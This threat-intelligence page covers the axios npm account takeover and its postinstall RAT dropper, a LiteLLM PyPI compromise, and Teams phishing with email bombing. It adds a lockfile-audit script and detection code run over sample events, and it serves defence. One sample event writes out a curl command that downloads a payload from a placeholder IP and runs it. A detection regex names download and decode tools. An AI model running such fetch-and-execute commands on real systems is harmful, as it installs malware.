high threat

Supply Chain Compromises via npm and PyPI Packages and Teams Phishing Campaigns

The April 2026 Red Canary Intelligence Insights report covers three threats from March 2026: the axios npm compromise, TeamPCP's compromise of LiteLLM via PyPI, and a surge in Microsoft Teams phishing paired with email bombing. Outcomes range from RAT deployment and credential harvesting to ransomware deployment and data theft.

Red Canary’s April 2026 Intelligence Insights report details several prominent threats observed in March 2026. The most significant was the axios npm compromise: on March 30, 2026, attackers took control of a lead maintainer’s npm account, changed its associated email address, and published two malicious versions of the axios package directly with the npm CLI, sidestepping the project’s GitHub Actions CI/CD release pipeline entirely. The poisoned releases pulled in a hidden dependency, plain-crypto-js@4.2.1, whose postinstall script acted as a cross-platform RAT dropper targeting macOS, Windows, and Linux systems. The report also covers the threat group TeamPCP, which compromised LiteLLM via PyPI, and a surge in Microsoft Teams phishing campaigns paired with email bombing, in which adversaries posing as IT support talk users into installing remote access (RMM) tools.

Attack Chain

  1. Initial Compromise: Attackers take control of a lead axios maintainer’s npm account and change its associated email address.
  2. Pipeline Bypass: Because the attacker now holds publish rights directly, the project’s GitHub Actions CI/CD release pipeline is never involved in the malicious releases.
  3. Malicious Package Publication: The attacker manually publishes two malicious versions of axios with the npm CLI.
  4. Dependency Injection: The poisoned releases declare a new, hidden dependency, plain-crypto-js@4.2.1, that legitimate axios releases do not carry.
  5. RAT Dropper Execution: When npm installs a poisoned axios version, plain-crypto-js runs its postinstall script, which functions as a cross-platform RAT dropper.
  6. Payload Installation: The dropper installs a remote access trojan (RAT) matching the host operating system: macOS, Windows, or Linux.
  7. Email Bombing and Teams Phishing (a separate campaign): Victims are flooded with spam email, then contacted over Microsoft Teams by an adversary posing as IT support.
  8. RMM Installation: The adversary talks the user into launching a remote access tool such as Microsoft Quick Assist and granting the adversary control of the device, which can end in ransomware deployment or data theft.
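Steps 4 and 5 describe two signals a consumer of axios could have checked before installing: a package that appeared in the dependency tree since a known-good lockfile, and a package that runs code at install time. The following is an added example written for this page (it is not Red Canary’s or the axios project’s code) that audits an npm package-lock.json (lockfileVersion 3 `packages` map) for both signals. The two lock objects are constructed for the example; only the name plain-crypto-js@4.2.1 comes from the report, and every other version string is a placeholder.

```javascript
// Added example (not Red Canary's or the axios project's code): audit a
// package-lock.json, lockfileVersion 3 "packages" map, for the two signals in
// steps 4-5 above: packages that run install-lifecycle scripts, and packages
// that were not present in a known-good baseline lock. Both lock objects are
// CONSTRUCTED; only plain-crypto-js@4.2.1 is a name taken from the report,
// every other version string is a placeholder.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];

// Known-good lock committed before the malicious releases (constructed).
const baselineLock = {
  lockfileVersion: 3,
  packages: {
    "": { name: "app", dependencies: { axios: "^1.0.0" } },
    "node_modules/axios": { version: "1.0.0", dependencies: { "follow-redirects": "^1.15.0" } },
    "node_modules/follow-redirects": { version: "1.15.0" },
  },
};

// Lock produced after resolving a poisoned axios release (constructed).
const candidateLock = {
  lockfileVersion: 3,
  packages: {
    "": { name: "app", dependencies: { axios: "^1.0.0" } },
    "node_modules/axios": {
      version: "1.99.0", // placeholder standing in for a malicious version
      dependencies: { "follow-redirects": "^1.15.0", "plain-crypto-js": "4.2.1" },
    },
    "node_modules/follow-redirects": { version: "1.15.0" },
    // npm sets hasInstallScript when a package declares preinstall/install/postinstall.
    "node_modules/plain-crypto-js": { version: "4.2.1", hasInstallScript: true },
  },
};

// "node_modules/a/node_modules/b" -> "b"
const pkgName = (lockPath) =>
  lockPath.slice(lockPath.lastIndexOf("node_modules/") + "node_modules/".length);

// Packages that are new, or changed version, relative to the baseline lock.
function addedOrChanged(baseline, candidate) {
  const out = [];
  for (const [path, entry] of Object.entries(candidate.packages)) {
    if (path === "") continue; // root project entry, not a dependency
    const prev = baseline.packages[path];
    if (!prev) {
      out.push({ name: pkgName(path), version: entry.version, reason: "new package" });
    } else if (prev.version !== entry.version) {
      out.push({ name: pkgName(path), version: entry.version, reason: `version changed from ${prev.version}` });
    }
  }
  return out;
}

// Packages that will execute code at install time: npm's hasInstallScript
// flag, or a scripts block naming one of the lifecycle hooks.
function installScriptPackages(lock) {
  return Object.entries(lock.packages)
    .filter(([path, entry]) => path !== "" &&
      (entry.hasInstallScript === true ||
       LIFECYCLE_HOOKS.some((hook) => entry.scripts && hook in entry.scripts)))
    .map(([path, entry]) => `${pkgName(path)}@${entry.version}`);
}

// The high-signal intersection: appeared since the baseline AND runs code on
// install. This is exactly the shape of steps 4-5.
function suspiciousAdditions(baseline, candidate) {
  const scripted = new Set(installScriptPackages(candidate));
  return addedOrChanged(baseline, candidate)
    .map((p) => `${p.name}@${p.version}`)
    .filter((id) => scripted.has(id));
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("changed since baseline:", addedOrChanged(baselineLock, candidateLock));
  console.log("runs install scripts:", installScriptPackages(candidateLock));
  console.log("review before installing:", suspiciousAdditions(baselineLock, candidateLock));
}
```

In practice the baseline is the committed lockfile and the candidate is the lock that a dependency update produces; anything `suspiciousAdditions` returns deserves a look at the package's source before the install is allowed to run its scripts. Pairing this with `npm ci --ignore-scripts` in CI means the review happens before any postinstall hook can execute.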

Impact

The axios npm compromise exposed every system that installed one of the two malicious versions to a RAT on macOS, Windows, or Linux. TeamPCP’s compromise of LiteLLM via PyPI shows the same supply chain path leading to credential harvesting and coinmining. The rise in Microsoft Teams phishing paired with email bombing leads to RMM tools being installed at the adversary’s direction, which can end in ransomware deployment or data theft. Successful attacks can result in significant financial loss, data breaches, and reputational damage.

Recommendation

  • Enable two-factor authentication (2FA) for every account with publish rights on the npm registry, so that a stolen password alone cannot push a release; this addresses the account takeover at the root of the axios compromise. On the consuming side, commit a lockfile and install in CI with `npm ci --ignore-scripts` so that an injected package cannot run a postinstall dropper, re-enabling scripts only for the few packages that genuinely need them.
  • Deploy the Sigma rule “Detect Suspicious Tar Archive Extraction” to surface archive extraction activity associated with the Microsoft Teams phishing campaigns.
  • Baseline the RMM and remote assistance tools legitimately used in your environment, Microsoft Quick Assist in particular, so that an unexpected instance, especially one launched by a non-admin user shortly after a Teams contact, stands out as the abuse described in the attack chain.
  • Require that all IT support calls take place over the organization’s approved video conferencing application, and teach users how to verify a caller’s identity before granting any remote access; an unsolicited Teams call from “IT” following a flood of spam is the pattern described in the analysis of these campaigns.

Detection coverage (3 rules)

Detect Suspicious Postinstall Script Execution

high

Detects suspicious execution of postinstall scripts, often used by malicious packages to install malware.

Sigma | tactics: installation | sources: process_creation, windows

Detect Suspicious Tar Archive Extraction

medium

Detects suspicious extraction of archives using the 'tar' command, which can be indicative of malicious activity following Teams phishing.

Sigma | tactics: defense_evasion | techniques: T1070.001 | sources: process_creation, windows

Detect Microsoft Quick Assist Execution by Non-Admin Users

medium

Detects execution of Microsoft Quick Assist by non-administrator users, which can be indicative of a user being tricked into granting remote access.

Sigma | tactics: initial_access | techniques: T1199 | sources: process_creation, windows
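To show what these three process-creation detections actually look for, here is an added example (not the platform’s Sigma rule text) that expresses their logic in JavaScript and runs it over constructed Sysmon Event ID 1 style events. Field names follow Sysmon; the file paths, user names, the admin allowlist, the drop-directory list and the IP address are assumptions made for the example. The match conditions are simplified heuristics, not the tuned rules the page refers to.

```javascript
// Added example (not the platform's Sigma rules): the logic of the three
// detections above over CONSTRUCTED Sysmon Event ID 1 style events. Paths,
// users, the admin allowlist, drop directories and the IP are assumptions.
const lower = (s) => String(s || "").toLowerCase();
const basename = (p) => lower(p).split(/[\\/]/).pop();

// Accounts expected to drive remote assistance sessions (assumed allowlist).
const ADMIN_ACCOUNTS = new Set(["corp\\helpdesk-admin"]);
// Where a phished user typically lands a downloaded archive (assumed).
const USER_DROP_DIRS = /(\\downloads\\|\\appdata\\local\\temp\\)/i;

const RULES = [
  {
    name: "Detect Suspicious Postinstall Script Execution",
    // npm runs lifecycle scripts through a shell spawned by node.exe. A build
    // step spawning a shell is normal; one that fetches and runs a payload is
    // not, so the shell's command line is what gets inspected.
    match: (e) =>
      basename(e.ParentImage) === "node.exe" &&
      ["cmd.exe", "powershell.exe", "pwsh.exe"].includes(basename(e.Image)) &&
      /(curl|certutil|bitsadmin|invoke-webrequest|downloadstring|frombase64string|\s-e(nc|c)?\s)/i
        .test(e.CommandLine || ""),
  },
  {
    name: "Detect Suspicious Tar Archive Extraction",
    // tar.exe ships with Windows 10+; extraction (x flag) of an archive sitting
    // in a user drop directory is the post-phishing step of interest.
    match: (e) => {
      if (basename(e.Image) !== "tar.exe") return false;
      const firstArg = lower(e.CommandLine).trim().split(/\s+/)[1] || "";
      const extracting = /^(-?[a-z]*x[a-z]*|--extract)$/.test(firstArg);
      return extracting && USER_DROP_DIRS.test(e.CommandLine || "");
    },
  },
  {
    name: "Detect Microsoft Quick Assist Execution by Non-Admin Users",
    match: (e) =>
      basename(e.Image) === "quickassist.exe" &&
      lower(e.IntegrityLevel) !== "high" &&
      !ADMIN_ACCOUNTS.has(lower(e.User)),
  },
];

// Returns [{ id, rules: [...] }] for every event that fires at least one rule.
function evaluate(events) {
  return events
    .map((e) => ({ id: e.id, rules: RULES.filter((r) => r.match(e)).map((r) => r.name) }))
    .filter((hit) => hit.rules.length > 0);
}

// Constructed sample events: 1, 3 and 5 should fire; 2, 4 and 6 are benign look-alikes.
// 198.51.100.7 is a documentation-range address, not a real indicator.
const QA = "C:\\Program Files\\WindowsApps\\QuickAssist\\QuickAssist.exe"; // path simplified
const EVENTS = [
  { id: 1, Image: "C:\\Windows\\System32\\cmd.exe", ParentImage: "C:\\Program Files\\nodejs\\node.exe",
    User: "corp\\bob", IntegrityLevel: "Medium",
    CommandLine: 'cmd.exe /d /s /c "curl -s http://198.51.100.7/p -o %TEMP%\\p.exe && %TEMP%\\p.exe"' },
  { id: 2, Image: "C:\\Windows\\System32\\cmd.exe", ParentImage: "C:\\Program Files\\nodejs\\node.exe",
    User: "corp\\bob", IntegrityLevel: "Medium",
    CommandLine: 'cmd.exe /d /s /c "node scripts/build.js"' },
  { id: 3, Image: "C:\\Windows\\System32\\tar.exe", ParentImage: "C:\\Windows\\System32\\cmd.exe",
    User: "corp\\bob", IntegrityLevel: "Medium",
    CommandLine: "tar.exe -xf C:\\Users\\bob\\Downloads\\support-tools.tar -C C:\\Users\\bob\\AppData\\Local\\Temp" },
  { id: 4, Image: "C:\\Windows\\System32\\tar.exe", ParentImage: "C:\\build\\agent.exe",
    User: "nt authority\\system", IntegrityLevel: "System",
    CommandLine: "tar.exe -xzf C:\\build\\artifacts\\release.tgz -C C:\\build\\out" },
  { id: 5, Image: QA, ParentImage: "C:\\Windows\\explorer.exe",
    User: "corp\\bob", IntegrityLevel: "Medium", CommandLine: "QuickAssist.exe" },
  { id: 6, Image: QA, ParentImage: "C:\\Windows\\explorer.exe",
    User: "corp\\helpdesk-admin", IntegrityLevel: "High", CommandLine: "QuickAssist.exe" },
];

if (typeof require !== "undefined" && require.main === module) {
  for (const hit of evaluate(EVENTS)) console.log(`event ${hit.id}: ${hit.rules.join("; ")}`);
}
```

The benign look-alikes matter as much as the hits: a shell under node.exe running a build script (event 2) and a build agent untarring its own artifacts (event 4) are the noise these rules have to survive, which is why the page’s recommendation to baseline legitimate tooling comes before tuning the detections.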
